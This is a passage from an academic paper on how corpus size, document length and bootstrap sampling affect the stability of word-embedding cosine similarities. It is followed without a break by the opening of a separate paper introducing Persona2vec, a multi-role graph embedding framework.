we extract data only for the year 2000 and focus on only two sections of the NYT dataset: sports and music. In the resulting corpora, the sports section is substantially larger than the music section (see Table 2). We treat an article as a single document. Reddit Reddit2 is a social website containing thou- sands of forums (subreddits) organized by topic. We use a dataset containing all posts for the years 2007- 2014 from two subreddits: /r/AskScience and /r/AskHistorians. These two subreddits allow users to post any question in the topics of history and science, respectively. AskScience is more than five times larger than AskHistorians, though the doc- 2https://www.reddit.com/ ument length is generally longer for AskHistorians (see Table 2). Reddit is a popular data source for computational social science research; for example, subreddits can be used to explore the distinctiveness and dynamicity of communities (Zhang et al., 2017). We treat an original post as a single document. 4 Corpus Parameters Order and presence of documents We use three different methods to sample the corpus: FIXED, SHUFFLED, and BOOTSTRAP. The FIXED setting includes each document exactly once, and the doc- uments appear in a constant, chronological order across all models. The purpose of this setting is to measure the baseline variability of an algorithm, independent of any change in input data. Algorith- mic variability may arise from random initializations of learned parameters, random negative sampling, or randomized subsampling of tokens within docu- ments. The SHUFFLED setting includes each docu- ment exactly once, but the order of the documents is randomized for each model. The purpose of this setting is to evaluate the impact of variation on how we present examples to each algorithm. The order of documents could be an important factor for algo- rithms that use online training such as SGNS. The BOOTSTRAP setting samples N documents randomly with replacement, where N is equal to the number of documents in the FIXED setting. The purpose of this setting is to measure how much variability is due to the presence or absence of specific sequences of 110 tokens in the corpus. See Table 3 for a comparison of these three settings. Size of corpus We expect the stability of embedding-based word similarities to be influenced by the size of the training corpus. As we add more documents, the impact of any specific document should be less significant. At the same time, larger corpora may also tend to be more broad in scope and variable in style and topic, leading to less idiosyn- cratic patterns in word co-occurrence. Therefore, for each corpus, we curate a smaller sub-corpus that contains 20% of the total corpus documents. These samples are selected using contiguous sequences of documents at the beginning of each training (this ensures that the FIXED setting remains constant). Length of documents We use two document seg- mentation strategies. In the first setting, each training instance is a single document (i.e. an article for the NYT corpus, an opinion from the Courts corpus, and a post from the Reddit corpus). In the second setting, each training instance is a single sentence. We ex- pect this choice of segmentation to have the largest impact on the BOOTSTRAP setting. Documents are often characterized by “bursty” words that are locally frequent but globally rare (Madsen et al., 2005), such as the name of a defendant in a court case. Sampling whole documents with replacement should magnify the effect of bursty words: a rare but locally frequent word will either occur in a Bootstrap corpus or not occur. Sampling sentences with replacement should have less effect on bursty words, since the chance that an entire document will be removed from the corpus is much smaller. 5 Algorithms Evaluating all current embedding algorithms and im- plementations is beyond the scope of this work, so we select four categories of algorithms that represent distinct optimization strategies. Recall that our goal is to examine how algorithms respond to variation in the corpus, not to maximize performance in the accuracy or effectiveness of the embeddings. The first category is online stochastic updates, in which the algorithm updates model parameters us- ing stochastic gradients as it proceeds through the training corpus. All methods implemented in the word2vec and fastText packages follow this format, including skip-gram, CBOW, negative sam- pling, and hierarchical softmax (Mikolov et al., 2013). We focus on SGNS as a popular and representative example. The second category is batch stochastic updates, in which the algorithm first collects a matrix of summary statistics derived from a pass through the training data that takes place before any parame- ters are set, and then updates model parameters using stochastic optimization. We select the GloVe algo- rithm (Pennington et al., 2014) as a representative example. The third category is matrix factorization, in which the algorithm makes deterministic updates to model parameters based on a matrix of summary statistics. As a representative example we include PPMI (Levy and Goldberg, 2014). Finally, to test whether word order is a significant factor we include a document-based embedding method that uses ma- trix factorization, LSA (Deerwester et al., 1990; Lan- dauer and Dumais, 1997). These algorithms each include several hyperparam- eters, which are known to have measurable effects on the resulting embeddings (Levy et al., 2015). We have attempted to choose settings of these parame- ters that are commonly used and comparable across algorithms, but we emphasize that a full evaluation of the effect of each algorithmic parameter would be beyond the scope of this work. For each of the following algorithms, we set the context window size to 5 and the embeddings size to 100. Since we re- move words that occur fewer than 20 times during preprocessing of the corpus, we set the frequency threshold for the following algorithms to 0. For all other hyperparameters, we follow the de- fault or most popular settings for each algorithm, as described in the following sections. 5.1 LSA Latent semantic analysis (LSA) factorizes a sparse term-document matrix X (Deerwester et al., 1990; Landauer and Dumais, 1997). X is factored using singular value decomposition (SVD), retaining K singular values such that X ≈ XK = UK ΣKV TK . The elements of the term-document matrix are weighted, often with TF-IDF, which measures the 111 importance of a word to a document in a corpus. The dense, low-rank approximation of the term-document matrix, XK , can be used to measure the relatedness of terms by calculating the cosine similarity of the relevant rows of the reduced matrix. We use the sci-kit learn3 package to train our LSA embeddings. We create a term-document matrix with TF-IDF weighting, using the default set- tings except that we add L2 normalization and sub- linear TF scaling, which scales the importance of terms with high frequency within a document. We perform dimensionality reduction via a randomized solver (Halko et al., September 2009). The construction of the term-count matrix and the TF-IDF weighting should introduce no variation to the final word embeddings. However, we expect variation due to the randomized SVD solver, even when all other parameters (training document order, presence, size, etc.) are constant. 5.2 SGNS The skip-gram with negative sampling (SGNS) algo- rithm (Mikolov et al., 2013) is an online algorithm that uses randomized updates to predict words based on their context. In each iteration, the algorithm pro- ceeds through the original documents and, at each word token, updates model parameters based on gra- dients calculated from the current model parameters. This process maximizes the likelihood of observed word-context pairs and minimizes the likelihood of negative samples. We use an implementation of the SGNS algorithm included in the Python library gensim4 (Řehůřek and Sojka, 2010). We use the default settings pro- vided with gensim except as described above. We predict that multiple runs of SGNS on the same corpus will not produce the same results. SGNS ran- domly initializes all the embeddings before training begins, and it relies on negative samples created by randomly selecting word and context pairs (Mikolov et al., 2013; Levy et al., 2015). We also expect SGNS to be sensitive to the order of documents, as it relies on stochastic gradient descent which can be biased to be more influenced by initial documents (Bottou, 2012). 3http://scikit-learn.org/ 4https://radimrehurek.com/gensim/models/ word2vec.html 5.3 GloVe Global Vectors for Word Representation (GloVe) uses stochastic gradient updates but operates on a “global” representation of word co-occurrence that is calcu- lated once at the beginning of the algorithm (Penning- ton et al., 2014). Words and contexts are associated with bias parameters, bw and bc, where w is a word and c is a context, learned by minimizing the cost function: L = ∑ w,c f(xwc) ~w ·~c + bw + bc − log(xwc). We use the GloVe implementation provided by Pennington et al. (2014)5. We use the default settings provided with GloVe except as described above. Unlike SGNS, the algorithm does not perform model updates while examining the original docu- ments. As a result, we expect GloVe to be sensitive to random initializations but not sensitive to the order of documents. 5.4 PPMI The positive pointwise mutual information (PPMI) matrix, whose cells represent the PPMI of each pair of words and contexts, is factored using sin- gular value decomposition (SVD) and results in low- dimensional embeddings that perform similarly to GloVe and SGNS (Levy and Goldberg, 2014). PMI(w, c) = log P (w, c) P (w)P (c) ; PPMI(w, c) = max(PMI(w, c), 0). To train our PPMI word embeddings, we use hyperwords,6 an implementation provided as part of Levy et al. (2015).7 We follow the authors’ recom- mendations and set the context distributional smooth- ing (cds) parameter to 0.75, the eigenvalue matrix (eig) to 0.5, the subsampling threshold (sub) to 10-5, and the context window (win) to 5. 5http://nlp.stanford.edu/projects/glove/ 6https://bitbucket.org/omerlevy/ hyperwords/src 7We altered the PPMI code to remove a fixed random seed in order to introduce variability given a fixed corpus; no other change was made. 112 Like GloVe and unlike SGNS, PPMI operates on a pre-computed representation of word co-occurrence, so we do not expect results to vary based on the or- der of documents. Unlike both GloVe and SGNS, PPMI uses a stable, non-stochastic SVD algorithm that should produce the same result given the same input, regardless of initialization. However, we ex- pect variation due to PPMI’s random subsampling of frequent tokens. 6 Methods To establish statistical significance bounds for our observations, we train 50 LSA models, 50 SGNS models, 50 GloVe models, and 50 PPMI models for each of the three settings (FIXED, SHUFFLED, and BOOTSTRAP), for each document segmentation size, for each corpus. For each corpus, we select a set of 20 relevant query words from high probability words from an LDA topic model (Blei et al., 2003) trained on that corpus with 200 topics. We calculate the cosine sim- ilarity of each query word to the other words in the vocabulary, creating a similarity ranking of all the words in the vocabulary. We calculate the mean and standard deviation of the cosine similarities for each pair of query word and vocabulary word across each set of 50 models. From the lists of queries and cosine similarities, we select the 20 words most closely related to the set of query words and compare the mean and standard deviation of those pairs across settings. We calculate the Jaccard similarity between top-N lists to com- pare membership change in the lists of most closely related words, and we find average changes in rank within those lists. We examine these metrics across different algorithms and corpus parameters. 7 Results We begin with a case study of the framing around the query term marijuana. One might hypothesize that the authors of various corpora (e.g. judges of the 4th Circuit, journalists at the NYT, and users on Reddit) have different perceptions of this drug and that their language might reflect those differences. Indeed, after qualitatively examining the lists of most similar terms (see Table 4), we might come to the conclusion that the allegedly conservative 4th Circuit LSA SGNS GloVe PPMI ALGORITHM 0.00 0.01 0.02 0.03 0.04 0.05 0.06 0.07 S T A N D A R D D E V IA T IO N fixed shuffled bootstrap Standard Deviation in the 9th Circuit Corpus LSA SGNS GloVe PPMI ALGORITHM 0.00 0.02 0.04 0.06 0.08 0.10 0.12 S T A N D A R D D E V IA T IO N fixed shuffled bootstrap Standard Deviation in the NYT Music Corpus Figure 1: The mean standard deviations across settings and algorithms for the 10 closest words to the query words in the 9th Circuit and NYT Music corpora using the whole documents. Larger variations indicate less stable embed- dings. judges view marijuana as similar to illegal drugs such as heroin and cocaine, while Reddit users view mari- juana as closer to legal substances such as nicotine and alcohol. However, we observe patterns that cause us to lower our confidence in such conclusions. Table 4 shows that the cosine similarities can vary signifi- cantly. We see that the top ranked words (chosen according to their mean cosine similarity across runs of the FIXED setting) can have widely different mean similarities and standard deviations depending on the algorithm and the three training settings, FIXED, SHUFFLED, and BOOTSTRAP. As expected, each algorithm has a small variation in the FIXED setting. For example, we can see the effect of the random SVD solver for LSA and the effect of random subsampling for PPMI. We do not observe a consistent effect for document order in the SHUFFLED setting. Most importantly, these figures reveal that the 113 4th Circuit NYT Sports Reddit Ask Science 0.80 0.82 0.84 0.86 0.88 0.90 0.92 0.94 Cosine Similarity distribute manufacture oxycodone distributing powder methamphetamine crack distribution cocaine heroin M o st S im il a r W o rd s LSA fixed shuffled bootstrap 0.45 0.50 0.55 0.60 0.65 0.70 Cosine Similarity steroids reserved substance involving violent several cocaine testing tested criticized M o st S im il a r W o rd s LSA fixed shuffled bootstrap 0.70 0.75 0.80 0.85 0.90 Cosine Similarity masturbation medication tobacco stress nicotine alcohol thc caffeine smoking cannabis M o st S im il a r W o rd s LSA fixed shuffled bootstrap 0.70 0.75 0.80 0.85 0.90 Cosine Similarity cigarettes powder narcotics crack drugs pills methamphetamine cocaine oxycodone heroin M o st S im il a r W o rd s SGNS fixed shuffled bootstrap 0.60 0.65 0.70 0.75 0.80 0.85 Cosine Similarity testing abuse substance urine alcohol counseling steroid nandrolone drug cocaine M o st S im il a r W o rd s SGNS fixed shuffled bootstrap 0.65 0.70 0.75 0.80 0.85 0.90 Cosine Similarity drug smoking lsd thc cocaine weed mdma tobacco nicotine cannabis M o st S im il a r W o rd s SGNS fixed shuffled bootstrap 0.45 0.50 0.55 0.60 0.65 0.70 0.75 0.80 Cosine Similarity possession growing smoked grams drugs distribute crack kilograms heroin cocaine M o st S im il a r W o rd s GloVe fixed shuffled bootstrap 0.2 0.3 0.4 0.5 0.6 0.7 Cosine Similarity positive suspensions blaming steroid purposes addiction testing smoking procedures cocaine M o st S im il a r W o rd s GloVe fixed shuffled bootstrap 0.4 0.5 0.6 0.7 0.8 Cosine Similarity effects drugs caffeine weed drug thc tobacco smoke smoking cannabis M o st S im il a r W o rd s GloVe fixed shuffled bootstrap 0.75 0.80 0.85 0.90 Cosine Similarity methamphetamine hydrochloride kilograms paraphernalia kilogram grams crack powder heroin cocaine M o st S im il a r W o rd s PPMI fixed shuffled bootstrap 0.5 0.6 0.7 0.8 0.9 Cosine Similarity steroid testing crack drugs substance positive tested alcohol drug cocaine M o st S im il a r W o rd s PPMI fixed shuffled bootstrap 0.70 0.75 0.80 0.85 0.90 0.95 Cosine Similarity smoke smokers thc cigar cigarettes smoking weed tobacco nicotine cannabis M o st S im il a r W o rd s PPMI fixed shuffled bootstrap Table 4: The most similar words with their means and standard deviations for the cosine similarities between the query word marijuana and its 10 nearest neighbors (highest mean cosine similarity in the FIXED setting. Embeddings are learned from documents segmented by sentence. BOOTSTRAP setting causes large increases in varia- tion across all algorithms (with a weaker effect for PPMI) and corpora, with large standard deviations across word rankings. This indicates that the pres- ence of specific documents in the corpus can signifi- cantly affect the cosine similarities between embed- ding vectors. GloVe produced very similar embeddings in both the FIXED and SHUFFLED settings, with similar means and small standard deviations, which indi- cates that GloVe is not sensitive to document order. However, the BOOTSTRAP setting caused a reduc- tion in the mean and widened the standard deviation, indicating that GloVe is sensitive to the presence of specific documents. 114 Run 1 Run 2 Run 3 Run 4 Run 5 Run 6 Run 7 viability fetus trimester surgery trimester pregnancies abdomen pregnancies pregnancies surgery visit surgery occupation tenure abortion gestation visit therapy incarceration viability stepfather abortions kindergarten tenure pain visit abortion wife fetus viability workday hospitalization arrival tenure groin gestation headaches abortions neck pain visit throat surgery pregnant hernia headaches headaches abortions grandmother expiration abortion summer trimester birthday pregnant daughter sudden pain suicide experiencing neck birthday panic fetal bladder abortion medications tenure fetus jaw Table 5: The 10 closest words to the query term pregnancy are highly variable. None of the words shown appear in every run. Results are shown across runs of the BOOTSTRAP setting for the full corpus of the 9th Circuit, the whole document size, and the SGNS model. Run 1 Run 2 Run 3 Run 4 Run 5 Run 6 Run 7 selection selection selection selection selection selection selection genetics process human darwinian convergent evolutionary darwinian convergent darwinian humans theory darwinian humans nature process humans natural genetics evolutionary species evolutionary darwinian convergent genetics human genetics convergent convergent abiogenesis evolutionary species evolutionary theory process process evolutionary species did humans natural natural natural natural human convergent natural humans did species nature natural process convergent process human humans species theory evolutionary creationism human darwinian favor Table 6: The order of the 10 closest words to the query term evolution are highly variable. Results are shown across runs of the BOOTSTRAP setting for the full corpus of AskScience, the whole document length, and the GloVe model. These patterns of larger or smaller variations are generalized in Figure 1, which shows the mean stan- dard deviation for different algorithms and settings. We calculated the standard deviation across the 50 runs for each query word in each corpus, and then we averaged over these standard deviations. The re- sults show the average levels of variation for each algorithm and corpus. We observe that the FIXED and SHUFFLED settings for GloVe and LSA produce the least variable cosine similarities, while PPMI pro- duces the most variable cosine similarities for all settings. The presence of specific documents has a significant effect on all four algorithms (lesser for PPMI), consistently increasing the standard devia- tions. We turn to the question of how this variation in standard deviation affects the lists of most similar words. Are the top-N words simply re-ordered, or do the words present in the list substantially change? Table 5 shows an example of the top-N word lists for the query word pregnancy in the 9th Circuit corpus. Observing Run 1, we might believe that judges of the 9th Circuit associate pregnancy most with questions of viability and abortion, while observ- ing Run 5, we might believe that pregnancy is most associated with questions of prisons and family visits. Although the lists in this table are all produced from the same corpus and document size, the membership of the lists changes substantially between runs of the BOOTSTRAP setting. As another example, Table 6 shows results for the query evolution for the GloVe model and the AskScience corpus. Although this query shows less variation between runs, we still find cause for concern. For example, Run 3 ranks the words human and humans highly, while Run 1 includes neither of those words in the top 10. These changes in top-N rank are shown in Figure 2. For each query word for the AskHistorians corpus, we find the N most similar words using SGNS. We generate new top-N lists for each of the 50 models trained in the BOOTSTRAP setting, and we use Jac- card similarity to compare the 50 lists. We observe similar patterns to the changes in standard deviation 115 LSA SGNS GloVe PPMI ALGORITHM 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 JA C C A R D S IM IL A R IT Y fixed shuffled bootstrap Variation in Top 2 Words LSA SGNS GloVe PPMI ALGORITHM 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 JA C C A R D S IM IL A R IT Y fixed shuffled bootstrap Variation in Top 10 Words Figure 2: The mean Jaccard similarities across settings and algorithms for the top 2 and 10 closest words to the query words in the AskHistorians corpus. Larger Jaccard similarity indicates more consistency in top N member- ship. Results are shown for the sentence document length. in Figure 2; PPMI displays the lowest Jaccard simi- larity across settings, while the other algorithms have higher similarities in the FIXED and SHUFFLED set- tings but much lower similarities in the BOOTSTRAP setting. We display results for both N = 2 and N = 10, emphasizing that even very highly ranked words often drop out of the top-N list. Even when words do not drop out of the top-N list, they often change in rank, as we observe in Figure 3. We show both a specific example for the query term men and an aggregate of all the terms whose average rank is within the top-10 across runs of the BOOTSTRAP setting. In order to highlight the av- erage changes in rank, we do not show outliers in this figure, but we note that outliers (large falls and jumps in rank) are common. The variability across samples from the BOOTSTRAP setting indicates that the presence of specific documents can significantly affect the top-N rankings. We also find that document segmentation size af- 0 5 10 15 20 25 30 35 RANK children women soldiers boys girls horses officers people peasants bodies W O R D Change in Rank: "men" 0 5 10 15 20 25 30 35 40 45 RANK FOR CURRENT ITERATION 1 2 3 4 5 6 7 8 9 10 A V E R A G E R A N K Change in Rank for All Queries Figure 3: The change in rank across runs of the BOOT- STRAP setting for the top 10 words. We show results for both a single query, men, and an aggregate of all the queries, showing the change in rank of the words whose average ranking falls within the 10 nearest neighbors of those queries. Results are shown for SGNS on the AskHis- torians corpus and the sentence document length. fects the cosine similarities. Figure 4 shows that documents segmented at a more fine-grained level produce embeddings with less variability across runs of the BOOTSTRAP setting. Documents segmented at the sentence level have standard deviations clustering closer to the median, while larger documents have standard deviations that are spread more widely. This effect is most significant for the 4th Circuit and 9th Circuit corpora, as these have much larger “docu- ments” than the other corpora. We observe a similar effect for corpus size in Figure 5. The smaller corpus shows a larger spread in standard deviation than the larger corpus, indicating greater variability. Finally, we find that the variance usually stabilizes at about 25 runs of the BOOTSTRAP setting. Figure 6 shows that variability initially increases with the number of models trained. We observe this pattern across corpora, algorithms, and settings. 116 1 2 3 4 5 6 7 8 9 10 RANK 0.05 0.00 0.05 0.10 0.15 0.20 S T A N D A R D D E V IA T IO N Document Size Comparison DOCUMENT SIZE sentence whole Figure 4: Standard deviation of the cosine similarities between all rank N words and their 10 nearest neighbors. Results are shown for different document sizes (sentence vs whole document) in the BOOTSTRAP setting for SGNS in the 4th Circuit corpus. 1 2 3 4 5 6 7 8 9 10 RANK 0.02 0.00 0.02 0.04 0.06 0.08 0.10 0.12 0.14 S T A N D A R D D E V IA T IO N Corpus Size Comparison CORPUS SIZE 0.2 1.0 Figure 5: Standard deviation of the cosine similarities between all rank N words and their 10 nearest neighbors. Results are shown at different corpus sizes (20% vs 100% of documents) in the BOOTSTRAP setting for SGNS in the 4th Circuit corpus, segmented by sentence. 8 Discussion The most obvious result of our experiments is to emphasize that embeddings are not even a single objective view of a corpus, much less an objective view of language. The corpus is itself only a sample, and we have shown that the curation of this sample (its size, document length, and inclusion of specific documents) can cause significant variability in the embeddings. Happily, this variability can be quan- tified by averaging results over multiple bootstrap samples. We can make several specific observations about al- gorithm sensitivities. In general, LSA, GloVe, SGNS, and PPMI are not sensitive to document order in the collections we evaluated. This is surprising, as we 5 10 15 20 25 30 35 40 45 50 NUMBER OF ITERATIONS 0.028 0.030 0.032 0.034 0.036 m e a n (S T A N D A R D D E V IA T IO N ) Stability over Iterations Figure 6: The mean of the standard deviation of the cosine similarities between each query term and its 20 nearest neighbors. Results are shown for different numbers of runs of the BOOTSTRAP setting on the 4th Circuit corpus. had expected SGNS to be sensitive to document order and anecdotally, we had observed cases where the embeddings were affected by groups of documents (e.g. in a different language) at the beginning of train- ing. However, all four algorithms are sensitive to the presence of specific documents, though this effect is weaker for PPMI. Although PPMI appears deterministic (due to its pre-computed word-context matrix), we find that this algorithm produced results under the FIXED ordering whose variability was closest to the BOOTSTRAP set- ting. We attribute this intrinsic variability to the use of token-level subsampling. This sampling method introduces variation into the source corpus that ap- pears to be comparable to a bootstrap resampling method. Sampling in PPMI is inspired by a similar method in the word2vec implementation of SGNS (Levy et al., 2015). It is therefore surprising that SGNS shows noticeable differentiation between the BOOTSTRAP setting on the one hand and the FIXED and SHUFFLED settings on the other. The use of embeddings as sources of evidence needs to be tempered with the understanding that fine- grained distinctions between cosine similarities are not reliable and that smaller corpora and longer docu- ments are more susceptible to variation in the cosine similarities between embeddings. When studying the top-N most similar words to a query, it is important to account for variation in these lists, as both rank and membership can significantly change across runs. Therefore, we emphasize that with smaller corpora comes greater variability, and we recommend that practitioners use bootstrap sampling to generate an 117 ensemble of word embeddings for each sub-corpus and present both the mean and variability of any sum- mary statistics such as ordered word similarities. We leave for future work a full hyperparameter sweep for the three algorithms. While these hyperpa- rameters can substantially impact performance, our goal with this work was not to achieve high perfor- mance but to examine how the algorithms respond to changes in the corpus. We make no claim that one algorithm is better than another. 9 Conclusion We find that there are several sources of variability in cosine similarities between word embeddings vec- tors. The size of the corpus, the length of individual documents, and the presence or absence of specific documents can all affect the resulting embeddings. While differences in word association are measur- able and are often significant, small differences in cosine similarity are not reliable, especially for small corpora. If the intention of a study is to learn about a specific corpus, we recommend that practitioners test the statistical confidence of similarities based on word embeddings by training on multiple bootstrap samples. 10 Acknowledgements This work was supported by NSF #1526155, #1652536, and the Alfred P. Sloan Foundation. We would like to thank Alexandra Schofield, Laure Thompson, our Action Editor Ivan Titov, and our anonymous reviewers for their helpful comments. References Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Jauvin. 2003. A neural probabilistic lan- guage model. Journal of Machine Learning Research, 3(Feb):1137–1155. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent dirichlet allocation. Journal of Machine Learning research, 3(Jan):993–1022. Tolga Bolukbasi, Kai-Wei Chang, James Y. Zou, Venkatesh Saligrama, and Adam T. Kalai. 2016. Man is to computer programmer as woman is to homemaker? Debiasing word embeddings. In NIPS, pages 4349– 4357. Léon Bottou. 2012. Stochastic gradient descent tricks. In Neural Networks: Tricks of the Trade, pages 421–436. Springer. Andreas Broscheid. 2011. Comparing circuits: Are some U.S. Courts of Appeals more liberal or conservative than others? Law & Society Review, 45(1), March. Dallas Card, Amber E. Boydstun, Justin H. Gross, Philip Resnik, and Noah A. Smith. 2015. The media frames corpus: Annotations of frames across issues. In ACL. Danqi Chen and Christopher D. Manning. 2014. A fast and accurate dependency parser using neural networks. In EMNLP, pages 740–750. Colin Cherry and Hongyu Guo. 2015. The unreasonable effectiveness of word representations for Twitter named entity recognition. In HLT-NAACL, pages 735–745. Scott Deerwester, Susan T. Dumais, George W. Furnas, Thomas K. Landauer, and Richard Harshman. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science, 41(6):391. Manaal Faruqui, Jesse Dodge, Sujay K. Jauhar, Chris Dyer, Eduard Hovy, and Noah A. Smith. 2015. Retrofitting word vectors to semantic lexicons. HLT-ACL, pages 1606–1615. Anna Gladkova and Aleksandr Drozd. 2016. Intrinsic evaluations of word embeddings: What can we do bet- ter? In Proceedings of the 1st Workshop on Evaluating Vector-Space Representations for NLP, pages 36–42. Yoav Goldberg. 2017. Neural Network Methods for Nat- ural Language Processing. Synthesis Lectures on Hu- man Language Technologies. Morgan & Claypool Pub- lishers. Ian Goodfellow, Yoshua Bengio, and Aaron Courville. 2016. Deep Learning. MIT Press. Nathan Halko, Per-Gunnar Martinsson, and Joel A. Tropp. September, 2009. Finding structure with randomness: Stochastic algorithms for constructing approximate ma- trix decompositions. Technical Report No. 2009-05. Applied & Computational Mathematics, California In- stitute of Technology. William L. Hamilton, Jure Leskovec, and Dan Jurafsky. 2016. Diachronic word embeddings reveal statistical laws of semantic change. In ACL. Johannes Hellrich and Udo Hahn. 2016. Bad company– neighborhoods in neural embedding spaces considered harmful. In Proceedings of COLING 2016, the 26th In- ternational Conference on Computational Linguistics: Technical Papers, pages 2785–2796. Ryan Heuser. 2016. Word vectors in the eighteenth- century. In IPAM Workshop: Cultural Analytics. Yoon Kim, Yi-I Chiu, Kentaro Hanaki, Darshan Hegde, and Slav Petrov. 2014. Temporal analysis of language through neural language models. Proceedings of the ACL 2014 Workshop on Language Technologies and Computational Social Science,. 118 Vivek Kulkarni, Bryan Perozzi, and Steven Skiena. 2016. Freshman or fresher? Quantifying the geographic vari- ation of language in online social media. In ICWSM, pages 615–618. Thomas K. Landauer and Susan T. Dumais. 1997. A so- lution to Plato’s problem: The latent semantic analysis theory of acquisition, induction, and representation of knowledge. Psychological Review, 104(2):211. Omer Levy and Yoav Goldberg. 2014. Neural word embedding as implicit matrix factorization. In NIPS, pages 2177–2185. Omer Levy, Yoav Goldberg, and Ido Dagan. 2015. Im- proving distributional similarity with lessons learned from word embeddings. Transactions of the ACL, 3:211–225. Rasmus E. Madsen, David Kauchak, and Charles Elkan. 2005. Modeling word burstiness using the dirichlet dis- tribution. In Proceedings of the 22nd International Con- ference on Machine Learning, pages 545–552. ACM. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013. Linguistic Regularities in Continuous Space Word Rep- resentations. HLT-NAACL. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word representation. In EMNLP, volume 14, pages 1532–43. Lawrence Phillips, Kyle Shaffer, Dustin Arendt, Nathan Hodas, and Svitlana Volkova. 2017. Intrinsic and ex- trinsic evaluation of spatiotemporal text representations in Twitter streams. In Proceedings of the 2nd Workshop on Representation Learning for NLP, pages 201–210. Radim Řehůřek and Petr Sojka. 2010. Software Frame- work for Topic Modelling with Large Corpora. In Pro- ceedings of the LREC 2010 Workshop on New Chal- lenges for NLP Frameworks, pages 45–50, Valletta, Malta, May. ELRA. Evan Sandhaus. 2008. The New York Times Annotated Corpus. LDC2008T19. Linguistic Data Consortium. Noam Shazeer, Ryan Doherty, Colin Evans, and Chris Waterson. 2016. Swivel: Improving Embeddings by Noticing What’s Missing. arXiv:1602.02215. Yingtao Tian, Vivek Kulkarni, Bryan Perozzi, and Steven Skiena. 2016. On the convergent properties of word embedding methods. arXiv preprint arXiv:1605.03956. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proceedings of the ACL, pages 384–394. Association for Computational Linguistics. Peter D. Turney and Patrick Pantel. 2010. From frequency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37:141–188. Ivan Vulic and Marie-Francine Moens. 2015. Bilingual word embeddings from non-parallel document-aligned data applied to bilingual lexicon induction. In Proceed- ings of the ACL, pages 719–725. ACL. Justine Zhang, William L. Hamilton, Cristian Danescu- Niculescu-Mizil, Dan Jurafsky, and Jure Leskovec. 2017. Community identity and user engagement in a multi-community landscape. Proceedings of ICWSM. 119 120 work_zjh4gwjbrfbs3m2w5jy3as4kdu ---- Persona2vec: a flexible multi-role representations learning framework for graphs Persona2vec: a flexible multi-role representations learning framework for graphs Jisung Yoon1,2, Kai-Cheng Yang2, Woo-Sung Jung1,3,4 and Yong-Yeol Ahn2,5,6 1 Department of Industrial and Management Engineering, Pohang University of Science and Technology, Pohang, Republic of Korea 2 Center for Complex Networks and Systems Research, Luddy School of Informatics, Computing, and Engineering, Indiana University, Bloomington, IN, USA 3 Department of Physics, Pohang University of Science and Technology, Pohang, Republic of Korea 4 Asia Pacific Center for Theoretical Physics, Pohang, Republic of Korea 5 Connection Science, Massachusetts Institute of Technology, Cambridge, MA, USA 6 Network Science Institute, Indiana University, Bloomington, IN, USA ABSTRACT Graph embedding techniques, which learn low-dimensional representations of a graph, are achieving state-of-the-art performance in many graph mining tasks. Most existing embedding algorithms assign a single vector to each node, implicitly assuming that a single representation is enough to capture all characteristics of the node. However, across many domains, it is common to observe pervasively overlapping community structure, where most nodes belong to multiple communities, playing different roles depending on the contexts. Here, we propose persona2vec, a graph embedding framework that efficiently learns multiple representations of nodes based on their structural contexts. Using link prediction- based evaluation, we show that our framework is significantly faster than the existing state-of-the-art model while achieving better performance. Subjects Artificial Intelligence, Data Science, Network Science and Online Social Networks, Social Computing Keywords Graph embedding, Overlapping community, Social context, Social network analysis, Link prediction INTRODUCTION Graph embedding maps the nodes in a graph to continuous and dense vectors that capture relations among the nodes (Perozzi, Al-Rfou & Skiena, 2014; Grover & Leskovec, 2016; Tang et al., 2015). Resulting node representations allow direct applications of algebraic operations and common algorithms, facilitating graph mining tasks such as node classification (Sen et al., 2008; Perozzi, Al-Rfou & Skiena, 2014), community detection (Fortunato, 2010; Yang et al., 2016), link prediction (Grover & Leskovec, 2016), visualization (Tang et al., 2015), and computer vision (Xie et al., 2020). Most methods map each node to a single vector, implicitly assuming that a single representation is sufficient to capture the full characteristics of a node. However, nodes often play multiple roles. For instance, people have multiple roles, or “personas”, across contexts (e.g., professor, employee, and so on) (Ahn, Bagrow & How to cite this article Yoon J, Yang K-C, Jung W-S, Ahn Y-Y. 2021. Persona2vec: a flexible multi-role representations learning framework for graphs. PeerJ Comput. Sci. 7:e439 DOI 10.7717/peerj-cs.439 Submitted 24 December 2020 Accepted 22 February 2021 Published 30 March 2021 Corresponding author Yong-Yeol Ahn, yyahn@iu.edu Academic editor Yilun Shang Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.439 Copyright 2021 Yoon et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.439 mailto:yyahn@�iu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.439 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Lehmann, 2010; Coscia et al., 2014; Leskovec et al., 2009; Leskovec, Lang & Mahoney, 2010). Similarly, proteins and other biological elements play multiple functionalities (Palla et al., 2005; Gavin et al., 2006; Ahn, Bagrow & Lehmann, 2010). Another example is the polysemy of words when their relations are modeled with graphs; many words possess multiple meanings differentiated by the contexts (Chen, Liu & Sun, 2014; Li & Jurafsky, 2015; Iacobacci, Pilehvar & Navigli, 2015). Explicit modeling of such multiplicity and overlapping clusters has been fruitful not only for community detection (Rosvall et al., 2014; Coscia et al., 2014; Epasto, Lattanzi & Paes Leme, 2017), but also for improving the quality of embedding (Li & Jurafsky, 2015; Epasto & Perozzi, 2019; Liu et al., 2019). Yet, with the scarcity of embedding methods embracing this idea, the full potential of this approach has not been properly explored. In this paper, we propose persona2vec, a scalable framework that builds on the idea of ego-splitting (Epasto, Lattanzi & Paes Leme, 2017), the process of identifying local structural contexts of a node via performing local community detection on the node’s ego-network. For each detected local community (role), we transform each node into multiple personas if there are multiple local communities to which the node belongs. After the split, the original node is replaced by the new persona nodes that inherit the connection from each local community, producing a new persona graph. Instead of separating a node’s persona nodes from each 